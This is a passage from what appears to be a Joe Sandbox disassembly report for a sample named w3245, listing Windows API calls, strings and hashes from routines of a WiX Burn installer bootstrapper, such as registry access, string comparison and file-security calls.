                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                                                                    • String ID: wininet.dll
                                                                                                                                                                    • API String ID: 2680864210-3354682871
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00948E44: lstrlenW.KERNEL32(00000100,?,?,?,00949217,000002C0,00000100,00000100,00000100,?,?,?,00927D87,?,?,000001BC), ref: 00948E69
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00949483
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0094949D
                                                                                                                                                                      • Part of subcall function 00940BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0091061A,?,00000000,00020006), ref: 00940C0E
                                                                                                                                                                      • Part of subcall function 009414F4: RegSetValueExW.ADVAPI32(00020006,00950D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0090F335,00000000,?,00020006), ref: 00941527
                                                                                                                                                                      • Part of subcall function 009414F4: RegDeleteValueW.ADVAPI32(00020006,00950D10,00000000,?,?,0090F335,00000000,?,00020006,?,00950D10,00020006,00000000,?,?,?), ref: 00941557
                                                                                                                                                                      • Part of subcall function 009414A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0090F28D,00950D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009414BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                                                                    • String ID: %ls\%ls
                                                                                                                                                                    • API String ID: 3924016894-2125769799
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID: crypt32.dll$wininet.dll
                                                                                                                                                                    • API String ID: 2001391462-82500532
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00020006,00950D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0090F335,00000000,?,00020006), ref: 00941527
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00020006,00950D10,00000000,?,?,0090F335,00000000,?,00020006,?,00950D10,00020006,00000000,?,?,?), ref: 00941557
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$Delete
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 1738766685-955085611
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0092E40B
                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 0092E4F2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                    • String ID: b[ m
                                                                                                                                                                    • API String ID: 3761405300-1980045442
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,00927691,00000000,IGNOREDEPENDENCIES,00000000,?,0094B518), ref: 0090DE04
                                                                                                                                                                    Strings
                                                                                                                                                                    • IGNOREDEPENDENCIES, xrefs: 0090DDBB
                                                                                                                                                                    • Failed to copy the property value., xrefs: 0090DE38
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                                    • API String ID: 1825529933-1412343224
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00918E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 0094566E
                                                                                                                                                                    • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00918E97,?), ref: 00945689
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoNamedSecuritySleep
                                                                                                                                                                    • String ID: aclutil.cpp
                                                                                                                                                                    • API String ID: 2352087905-2159165307
                                                                                                                                                                    APIs
                                                                                                                                                                    • LCMapStringW.KERNEL32(0000007F,00000000,00000000,009170E8,00000000,009170E8,00000000,00000000,009170E8,00000000,00000000,00000000,?,00902318,00000000,00000000), ref: 009015D0
                                                                                                                                                                    • GetLastError.KERNEL32(?,00902318,00000000,00000000,009170E8,00000200,?,009452B2,00000000,009170E8,00000000,009170E8,00000000,00000000,00000000), ref: 009015DA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastString
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 3728238275-3612885251
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 009157D9
                                                                                                                                                                    • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00915833
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize COM on cache thread., xrefs: 009157E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                    • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                                    • API String ID: 3442037557-3629645316
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00943A8E,?), ref: 00943C62
                                                                                                                                                                    Strings
                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00943C0C
                                                                                                                                                                    • EnableLUA, xrefs: 00943C34
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                                    • API String ID: 47109696-3551287084
                                                                                                                                                                    • Opcode ID: 041835b202df6dde54644facd19c630f0ccf460b9e56dfc25eebee054d3bd856
                                                                                                                                                                    • Instruction ID: d0148f0db4ce42beeb76f11362ef2c2924889db1d0d2dd56cf45a8a5bcd4739a
                                                                                                                                                                    • Opcode Fuzzy Hash: 041835b202df6dde54644facd19c630f0ccf460b9e56dfc25eebee054d3bd856
                                                                                                                                                                    • Instruction Fuzzy Hash: B1017C32D10238FBD7209AB4D846FAEF7ACDB54726F2085A5AD40B3011D3755E5096D0
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00901104,?,?,00000000), ref: 00905142
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00901104,?,?,00000000), ref: 00905172
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareStringlstrlen
                                                                                                                                                                    • String ID: burn.clean.room
                                                                                                                                                                    • API String ID: 1433953587-3055529264
                                                                                                                                                                    • Opcode ID: da0cf0de1a8b3772666198666fa99b8f201dd6857d4956632c5e0635f28825f2
                                                                                                                                                                    • Instruction ID: 4686e046517205dcbd87220a6f666a84abe4095755b32310dc0c1888cf4bec0c
                                                                                                                                                                    • Opcode Fuzzy Hash: da0cf0de1a8b3772666198666fa99b8f201dd6857d4956632c5e0635f28825f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D01AD7261C6206FC7308B88AC84E33BBADEB197A0B11411BF809D3660C3B0EC41DFA1
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946985
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID: `<u$atomutil.cpp
                                                                                                                                                                    • API String ID: 3341692771-4051019476
                                                                                                                                                                    • Opcode ID: 9f99ad7eaec944c9c927c0b264295d229048407d1c5cc6a22a172889562a091f
                                                                                                                                                                    • Instruction ID: 465befa3c4003ab96d21e1db92f766fa9b840f3ee80f7708a7d530d6b244940b
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f99ad7eaec944c9c927c0b264295d229048407d1c5cc6a22a172889562a091f
                                                                                                                                                                    • Instruction Fuzzy Hash: EC01F4B6804118FBCB325A958C05FAEF7BDAF86B21F254155B80066150C7F68E00E7E2
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00906534
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                      • Part of subcall function 00905CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00905D68
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set variant value., xrefs: 00906571
                                                                                                                                                                    • Failed to get 64-bit folder., xrefs: 00906557
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                    • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                                    • API String ID: 3109562764-2681622189
                                                                                                                                                                    • Opcode ID: c54bbc6078d869e3bab012b54d1692dd0f3e351f377f0377d499c5d21d962067
                                                                                                                                                                    • Instruction ID: 080368fc951a184f394bd279cf1250ee07a7a3611d903c54df40da8cf329a2d7
                                                                                                                                                                    • Opcode Fuzzy Hash: c54bbc6078d869e3bab012b54d1692dd0f3e351f377f0377d499c5d21d962067
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E016D32D02628BFCB21ABA0DD06E9EBB7CEF44721F114196F900A6195D7719F60DBD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009010DD,?,00000000), ref: 009033E8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009010DD,?,00000000), ref: 009033FF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                    • String ID: pathutil.cpp
                                                                                                                                                                    • API String ID: 2776309574-741606033
                                                                                                                                                                    • Opcode ID: c7a1868e1fcbf9c05733308b85b357ebd736bae31abe71cbbd185dac9c381213
                                                                                                                                                                    • Instruction ID: af97c7ad1f5edefc8384b2cde73173bf65d9cdd20e865d3ae2e7b0ed1a2c97c1
                                                                                                                                                                    • Opcode Fuzzy Hash: c7a1868e1fcbf9c05733308b85b357ebd736bae31abe71cbbd185dac9c381213
                                                                                                                                                                    • Instruction Fuzzy Hash: CEF0F673A485356FC332569A9C49E9BFA5CEB86B70B528121FE04BF190DB60DD0082E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0092EBD2
                                                                                                                                                                      • Part of subcall function 00931380: RaiseException.KERNEL32(?,?,?,0092EBF4,?,00000000,00000000,?,?,?,?,?,0092EBF4,?,00967EC8), ref: 009313DF
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0092EBEF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                    • Opcode ID: c086a457aa753ee8f10da5ababf6b840f6214100ed49b081e348d3b217df6215
                                                                                                                                                                    • Instruction ID: c475f30fb299322601a5d43384b5ce8b5ba91ab4a2fad3213da1205baa6e9236
                                                                                                                                                                    • Opcode Fuzzy Hash: c086a457aa753ee8f10da5ababf6b840f6214100ed49b081e348d3b217df6215
                                                                                                                                                                    • Instruction Fuzzy Hash: 57F0223480031CBACF00FAA5F89AFADB36C4A80350F504561FC24924E9EB30EE19CAD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,0090BA1D,?,?,?,00000000,00000000), ref: 00944A1D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0090BA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00944A27
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastSize
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 464720113-2967768451
                                                                                                                                                                    • Opcode ID: 9968dc78c23f9b7b0465baea52df15f12b8ccde6f0c5cfaf865619f3fb6c53ae
                                                                                                                                                                    • Instruction ID: 15b178577ca9bbf0aa82fd0ae550b8d68f602c88e5ef3107dd31e9076a0fc6e2
                                                                                                                                                                    • Opcode Fuzzy Hash: 9968dc78c23f9b7b0465baea52df15f12b8ccde6f0c5cfaf865619f3fb6c53ae
                                                                                                                                                                    • Instruction Fuzzy Hash: E3F0C277A5423AAB97208F89C905E5AFBACFF44B20F01811AFD44A7300E770AD00CBD4
                                                                                                                                                                    APIs
                                                                                                                                                                    • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00905466,?,00000000,00905466,?,?,?), ref: 00943DA7
                                                                                                                                                                    • CoCreateInstance.OLE32(00000000,00000000,00000001,0096716C,?), ref: 00943DBF
                                                                                                                                                                    Strings
                                                                                                                                                                    • Microsoft.Update.AutoUpdate, xrefs: 00943DA2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                    • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                                                    • API String ID: 2151042543-675569418
                                                                                                                                                                    • Opcode ID: d826adb31405da4caa9c9cba99f1bec8016c4da2d34b59497d6085a523f73557
                                                                                                                                                                    • Instruction ID: 6c3417c1319869861edd8e832c0853358827c0c38c6f892324bdf2d82d1f2b6a
                                                                                                                                                                    • Opcode Fuzzy Hash: d826adb31405da4caa9c9cba99f1bec8016c4da2d34b59497d6085a523f73557
                                                                                                                                                                    • Instruction Fuzzy Hash: DAF05475615108BBDB00EFF9DD05EEFB7BCDB49710F400165EA01E7150D671AE0486A2
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00940E28
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                    • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                                    • API String ID: 190572456-850864035
                                                                                                                                                                    • Opcode ID: 0c55273da00d06cf8521bcf2358027f9fff19f549a233b61c0c7eb592edb8c2f
                                                                                                                                                                    • Instruction ID: 8dbcceead51d4b468dbafd511b095b45c6fc67e56b8d189600d15ca3a1c8e35f
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c55273da00d06cf8521bcf2358027f9fff19f549a233b61c0c7eb592edb8c2f
                                                                                                                                                                    • Instruction Fuzzy Hash: 94E0EC715192259AC7215B15FD19F427F94A791769F004169E509D6270F3F24890EB90
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C833C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00C810DD,?,00000000), ref: 00C833E8
